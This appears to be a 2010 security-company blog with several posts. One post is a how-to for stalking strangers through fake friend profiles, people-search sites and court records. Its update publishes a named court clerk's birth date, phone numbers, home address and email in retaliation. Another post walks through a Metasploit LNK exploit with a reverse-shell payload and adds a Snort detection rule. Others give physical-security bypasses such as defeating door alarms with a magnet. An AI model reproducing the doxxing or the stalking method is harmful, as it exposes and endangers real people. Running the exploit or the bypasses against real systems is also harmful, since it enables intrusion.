So if you're a customer, read your penetration test reports, if not, keep up on the latest information security news to get a taste of the kinds of things you'll see next month. This year's Hack Challenge is scheduled for September 22, 2010 and will be an excellent learning event whether you're watching or participating. Please register at http://www.clevelandhacks.com .
Tuesday, August 31, 2010
Hack Challenge? Should Seem More Familiar Than You Think...
Tuesday, August 17, 2010
Your Information and How I Got It
If you're not careful, the victim in this story could be you. In today's world, many people are so willing to give away information via online social means. The main problem with social media is what makes it so appealing in the first place: it's social. Anytime you post something online you are inviting your friends, family, and complete strangers to come view your actions. Sure, you may think that you're beating the system and setting all your photos and blogs to private and viewable to "Friends Only", but even that doesn't stop someone who is really dedicated to obtaining your information. A few key spots to start looking for someone are Facebook, MySpace, and oddly enough, even an online phone book.
Now, we'll actually need someone to find: What about the cute barista who smiles at you at the coffee shop every afternoon during lunch? Or the girl at the Dave & Buster's ticket counter who always strikes up a conversation? Maybe even the cashier at the Giant Eagle that's always careful with the eggs when he bags your groceries. Any of these are prime choices for your experiment. Just take a quick peek at their name tag and you've got your first clue. Now that we've got a name, a good place to springboard from would be Facebook. With over 400 million active users, you’re bound to come across someone interesting. So go ahead and type your victim’s name into the search box and we’ll see what comes up. Anything interesting? Hmm, over 500 people are named Emma. Let’s try narrowing this down a bit. You can refine your search by Location, School, and Workplace. Depending on how you found this person in the first place, you have a few options you could utilize. If you’re using one of our examples from earlier, then you will already know where they work. Most of the time you can safely assume that they’ll live in the general area as well.
Usually, this should be enough to find your new friend. But, if that still doesn’t narrow it down enough, you can find out where they go to school through a little social engineering. Next time you order your venti doubleshot soy latte, just casually bend the truth and mention, “Hey, I think I’ve seen you around campus before. Do you go to [INSERT SCHOOL HERE]?” If you’re lucky, maybe they’ll reply, “Oh yeah! I’m a theatre major and I’m taking acting over the summer. What do you study?” Then, perhaps instead of stalking this poor person, you’ll actually strike up a conversation and become friends like a normal person would...but that’s not the point of this article. Let’s say you find their Facebook profile. What do you do next? If their profile is open to the world and you can read anything and everything on it, feel free to skip this paragraph. But, if this person was smart they would at least lockdown their profile to some degree. The easy way out is to just add them as a friend and pray they accept you. But, if you wanted to be sneaky (and who doesn't?), you can trick them into adding you. One of the most common aspects of a profile that most people leave alone is the friend list. What you can do is poke around in this person's list of friends and find a profile that IS totally open. From there you can make a dummy account and just copy their details. No need to copy every last detail, just enough to make it look believable. Perhaps a few pictures here and there and just a copy & paste of their main description. With a fake matching account, send a Friend Request to the stalkee and just wait to be accepted.
Now that you have access to this person's account, you have free reign over all the information it holds. You can find personal phone numbers, e-mail addresses, screen names, and even a home address in most cases. Obviously, this is exactly the type of data that can help a would-be stalker like yourself. Using this newfound data, you can try digging a little deeper using Pipl (http://www.pipl.com), a search engine that looks through "the deep web" to find information on people. Pipl will search for and display anything it can find regarding that person on the Internet. Blog posts, news articles, Facebook/MySpace/Twitter profiles, e-mail addresses, screen names, even your home address. They're all fair game for Pipl. What's most shocking is that it will even return any of your government public records listed on the Internet, including court records.
Still hungry like the wolf for "private" data? Well, look no further than Spokeo (http://www.spokeo.com). Much like Pipl, Spokeo gathers information from access all sorts of social networks, phone books, and the other websites, and compiles it into an intruding list that would make any creep squeal in excitement. Aside from the basics (name, age, location, web profiles, etc.), Spokeo will also display the residents of a household, the build of the house (room numbers, size, estimated value), the average age, ethnicity, and income of the neighborhood, and a person's interests (it knew that my father "owns a truck"). Scary, right? And that's only what you get for free! Spokeo offers paid subscription models for varying lengths of time that will allow you access to a near limitless amount of information on over 300 million people.
Now, in a perfect world, this person doesn't have a MySpace or Facebook or whatever may be the latest trending social site. But, no matter how anti0social someone is, that won't protect them from the long arm of the law. let's face it, everyone runs into a little legal trouble sooner or later (come on, you can only hide your tormented Elton John albums for so long). This is when we turn to the master of privacy invasion: Uncle Sam. A nice place to start would be the Country Clerk of Courts. Most of them have websites these days which makes our job much easier than sifting through paper records. For example, let's head over to the Cuyahoga County website (http://coc.cuyahogacounty.us) and find the link for "Civil/Criminal Case Docket" (both take you to the same place). Before you access the database, you'll have to agree to the terms of service. Now, from here you can choose to search through the civil or criminal cases. Personally, I would recommend the civil cases since they're more common. All you need is a first of last name (and time to look through common names) to find a record. Once you find a case, you can view a brief summary of the case, the involved parties, costs, and the docket, which gives you a timeline of the court events. Pretty useful I suppose.
Not specific enough for you? City-level recourse are usually more incriminating, so let's try to dig a little deeper. Since no one can decide on one universal domain format, you'll have to Google your city's court site ("[CITY NAME AND SATE] Clerk of Courts" works well for me). I'll use Rocky River (http://rrcourt.net) for this demonstration. You'll need to look for the "Public Access" link (or something similar for other sites). You'll notice that most of the search options are the same as the county; again, all you need is a last name and you'll be swimming in court records. Of course, you can see the usual: involved parties, costs, docket, etc. But what's shocking is the amount of extra information that is made available. Looking at recent records, I can see the height, weight, hair and eye color, race, and even a person's drivers license number and home address. Seems a little unnecessary to me, but I'm not complaining - this can all be useful to someone who would be reading this article.
Lucky for me, aside from becoming a hermit living under a bridge for the rest of your life, there isn't much you can do to keep yourself disconnected. So go ahead, run that red light while you're Tweeting that you're on your way home for the coolest party of the decade. Chances are, I'm already at your front door.
UPDATE:
Alright, so now I'm complaining. After putting the finishing touches on this article and sending it off, literally 2 days later I get pulled over by an officer who allegedly saw me speeding. Sure enough, it was in a district that uses the Rocky River court system to handle these matters. A scan of my ticket showed up online, along with my phone number (thank you Google Voice), home address, and signature. So yes, thanks to "karma" my very own private information is available online. I won't post a direct link to the case, but you should be able to find it if you actually read this article.
So what did I do? What any good hypocrite would: complain. I issued a formal complaint with the magistrate and she directed me to the Clerk of Courts. After dealing with a peon behind the the safety of her glass window, I managed to get some time in with the Clerk:
Deborah "Debbie" F. Comery
06/29/1947
Personal: (440)-333-8280
Work: (440)-333-0666 ext. 100
22600 Marlys Dr
Rocky River, OH 44116
dfcomery@cox.net
http://members.cox.net/comery4clerk
According to good ol' Debbie, I would have to file a motion to have my information removed from the Public Access website. So after waiting about a week, I finally got a letter saying that the motion was granted and everything should be gone. But when I went to check, I noticed my phone number was still listed. Sure, the scanned ticket (which had my signature) is gone, but I paid $10 to have my phone number removed and it's still there. So have fun with that until I talk to Deborah some more. At least I have plenty of options to reach her now.
Moral of the story: Don't break the law. If you do, don't get caught. If you happen to get caught, complain. It won't get you out of a ticket, but at least the world won't be able to call and mock you.
Friday, August 13, 2010
ATMs - Delicious Distributors of Benjamins or The Devil?
We have a saying where I'm from "once you have physical access to a machine, game is over." Well ATMs are thought to be special because they are super secure and physical access is kind of a requirement for them. You would think their manufacturers, providers, customers, someone would demand better security from these literal money machines. Do they?
You decide. Here are a couple pictures that might help you make up your mind:
The first one is courtesy of Rick Deacon (@rickdeaconx on twitter):
I don't know about you but that looks like a Windows blue screen of death. Now I'm not going to go all "anti windowsy" on you here but really? To be perfectly honest I'm not sure I'd trust Linux out there on its own to run what is literally a money machine. I think some sort of purpose built OS that was chip based would be more ideal to running money machines. Eh, what do I know, I only break Windows and Linux machines for a living.
Next up we have my masterpiece, my favorite money machine in the whole wide world, located in a local (to me anyway) eatery:
Tuesday, August 3, 2010
DefCon 18
The conference itself was bigger than ever, clocking in at over 9000 attendees this year. That left the poor helpless Riviera conference rooms overflowing into the hallways. The wait times varied per talk, but the highly publicized talks had the longest lines. The general consensus is that DefCon needs to move to a bigger hotel -- and the complaints were heard. Rumor is DefCon 19 will take place at the Rio Hotel & Casino next year.
Bright and early Thursday morning we were up and out the door to retrieve our badges. This year, the badges consisted of a piece of aluminum carved up with various circuits on them controlling the LCD screen and corresponding buttons on the badge. The LCD screen scrolled through multiple pages at the push of the button. Some of the screens allowed codes to be entered, allowing access to special parties or unlocking parts of the badge. That is the beauty of the DefCon badge, it is completely hackable. This year it was created with a built-in mini-USB port in order to allow easy access to the badge for reprogramming. Information about the badge can be found here.
Thursday concluded with a number of 'n00b talks' including introductions to lock-picking, hardware hacking, and DefCon itself. Also on Thursday were the two other security conferences in Las Vegas, B-Sides and Black Hat. The night after DefCon ended on Thursday, the Security Twits meet-up took place, which is where many information security individuals on Twitter came together to discuss various aspects of Black Hat/DefCon/B-Sides.
Friday began the main speaking tracks and talks. The KeyNote started at 10AM, and the line was out the door and around a few corners for that one. I followed up the KeyNote talk with a talk about the re-exploitation of the now patched MS09-012 vulnerability. This talk was very interesting in that it gave the workaround in order to exploit this vulnerability again. The original outlined how to impersonate tokens of privileged users, which is very important in many penetration tests. Token impersonation allows an unprivileged user to gain access to the SYSTEM account, which has the most control of a Windows system. This talk expanded on that vulnerability stating that Microsoft did not successfully/fully patch the problem, because you still have the ability to exploit IIS 6, 7 and SQL in certain instances. Exploit code was also released with this talk.
The next talk I saw of interest was the talk given by an employee of Qualys, who released a tool to help fingerprint static web applications which were obfuscated to hide their true identity. This was a short talk but gave a good overview of the tool, BlindElephant, which can be found here.
Two other important talks from Friday were about hacking Oracle and WebSphere via ASP. The WebSphere talk detailed the workarounds in order to perform directory listing on 'patched' vulnerabilities. This, combined with a vulnerability in WAS, allowed file upload, and WAR deployment. At that point, you have shell on the server and most likely have control over it. The Oracle talk was a GREAT help as there have not been many white papers or talks detailing the proper way to use SQL injection to leverage your way into a shell on a machine using Oracle. Web applications using Oracle are becoming more prevalent, and this talk was a gold-mine for a penetration tester. The SQL statements in order to gain a shell on a machine(assuming some other configuration variables exist) were given.
Saturday rolled around and gave us another day of talks... probably some of the most publicized talks as well. Saturday contained both the GSM cell phone hacking and the ATM hacking talks. The GSM hacking talk discussed how to build a call interceptor for a medium-sized coverage area for around $1,000, then demonstrated it's abilities on stage. It intercepted about 30 cell phones. This talk gained a lot of press and has many articles about it on the Internet. Many can be found here. The ATM hacking talk outlined the ability to exploit Automated Teller Machines. I did not see this talk due to lines, but there are also many articles about this talk that were published.
The other highlights of Saturday for penetration testers, like myself, were the anti-reversing talk, physical security talk and rebinding attack on home routers. The anti-reversing talk was of a half joke/half serious nature. The talk displayed and described ways to obfuscate code to the point where a reverser who was taking apart your binary would eventually just give up and walk away. The physical security talk walked through how to properly implement and enact a physical security policy on a company that does not have one. It also gave some interesting information on some lesser-known vulnerabilities that occur in physical security situations. The person presenting this talk also seemed to have dealt with many CEO types in his day. As a physical security implementer, this gave him the ability to describe some 'mental weaknesses' that the people who make decisions sometimes have. This gives a penetration tester the edge up. :)
The last talk that really impressed me on Saturday, detailed the ability to rebind DNS to home routers(Linksys, Dell, Netgear, etc) and allowed an attacker to connect to the internal management web interface of these routers, from an external source on the Internet. The attack leveraged a server that needed client-interaction(i.e., a link clicked) against these routers. It exploits the 'weak end model system' on the IP stack of the vulnerable routers "which have specifically configured firewall rules, and who bind their Web service to the router's WAN interface". The attack was demonstrated on stage and could open up thousands of home routers to attack and exploitation. The tool and a little better explanation can be found here.
We left to come back to Ohio on Sunday morning, but not without gaining a ton of knowledge and having a bunch of fun in the process.
Note that if you are interested in seeing all the slides/outlines of the talks mentioned as well as the rest of the talks at DefCon, follow the news at http://www.defcon.org, which is where all the talks will be released with both MP3 and video in the coming months.
Wednesday, July 21, 2010
Microsoft LNK Attack and Defense
First start "msfconsole" and select the LNK module use -
use exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute
Check the modules options -
show options
We will then select a payload and set the proper addresses for our attack -
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.100.1
set srvhost 192.168.100.1
set lhost 192.168.100.1
set srvhost 192.168.100.1
Start the exploit server -
exploit
Now that the exploit service is running we will direct our target to the attacking service with a http call. On our target machine we will browse directly to our attacking service using Internet Explorer -
After the target machine connects to our attacking service it will be redirected to a WebDav share with our LNK file and a payload file (dll) that will be executed -
Because of the way windows handles the LNK file the target does not have to actually click on the file, viewing the file is enough to trigger the exploit. On our attacking machine we can see the target connecting to our service and successfully exploited -
We can now interact with our target -
session -i 3
Now that we have successfully demonstrated an attack lets take a look at how we can defend against this.
Microsoft has posted some work arounds for this issue -
This attack can also be mitigated at the network level with a IDS/IPS. The following rule was successful in detecting this activity in snort -
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS Windows Shell LNK GET request via WebDAV possible remote exploit"; flow:established,to_server; content:"GET"; http_method; uricontent:".lnk"; nocase; content:"Microsoft-WebDAV-MiniRedir"; http_header; classtype:bad-unknown; reference:url,www.microsoft.com/technet/security/advisory/2286198.mspx; reference:cve,CVE-2010-2568;sid:2011229; rev:1;)
Here is a screenshot from base showing the snort alert -
Checkpoint has also release an update that will detect this attack -
Monday, July 19, 2010
Another Day, Another Naughty Doctor's Office
I think I'm going to start a photo-journal of just all the unlocked, unattended doctor/nurse/medical assistant workstation. Basically this is similar to http://hlurl.com/fa but this time I was able to actually talk to the nurse and doctor involved and get their insight. This one is brought to us by a local independent practitioner who I really liked and might have actually solved a long-standing problem of mine. Unfortunately his office needs some basic security practices put in place so away we go:
Once again I was left alone in the office and once again a computer (laptop no less) was left unlocked right in front of me. The big difference here is that the medical application was left open and I could've "explored" all of their patient records. This is obviously less than desirable. This was the nurse's workstation, when he returned I asked him about it. The response was my personal favorite that my guys use when I catch them doing something stupid, "I usually never do that." After I was done rolling my eyes I explained what I do for a living and he said "okay I'm busted." The next time he left the room, he took the laptop with him.
I was then ushered into another room where I got to wait for the doctor. He comes in, with his laptop, sits down and logs in. About 10 minutes into the exam he left the room to get some supplies. Guess what? That's right, laptop left in the room, logged into the medical app. When he returned, I explained what happened with his nurse and then what just happened with him. He then went on to explain that "EMRs (Electronic Medical Records) are already a pain in the ass, now I have to worry about this laptop." Apparently when you lock this workstation it logs you out of the medical app too so that's his pain point. He has to log in twice if he locks it, once into the computer and once into the application.
The choices here are pretty clear cut. Log in twice or expose all of the patient records to anyone sitting in the office. Perhaps the app is capable of single sign on with the OS? Not sure what the easier answer is but it can't be to just leave the workstation there unlocked and unattended. It makes me sad that the latter is probably what most people will choose.
Physical Security -- Some Quick Observations
Doors - Typical office doors have the ability to be opened from the inside without a key, for the most part. They also are often not a knob type door handle. There is a vulnerability that exists in these types of doors that would allow a person to pry the door open by sliding a metal tool under the door and using it to pull down on the handle. An example demonstration of this can be found here. This tool would only work with sufficient space under the door for the tool to slide... so the key to fixing this issue would be to limit the gap between the floor/carpet and the door.
Another door issue that remains is good old lock-picking. Pick proof locks help out here.
Motion Detectors - Many can be subverted by moving slowly, holding a large object in front of you or crawling low to the ground. Your results may vary, but these simple techniques will often get you past many motion sensors. The fix for this would be to upgrade your motion sensors, raise the sensitivity of the sensors and adjust the angle and view that the sensors have.
Alarms - Many door alarms are comprised of two magnets, one on the frame of the door and one on the door itself. When the magnets are 'connected' or attracted together(i.e. door closed), they form a sort of circuit. When the circuit is broken(door opened), the alarm would go off. A very simple way to exploit these systems is to put a strong magnet on the door frame magnet. This will keep the circuit closed and will not set off the alarm when the door is opened. Upgrading the door alarm triggers and disabling any access to the magnets themselves would hinder this exploit.
That's all for now. More to come as we dig deeper.
Subscribe to:
Posts (Atom)
Posts
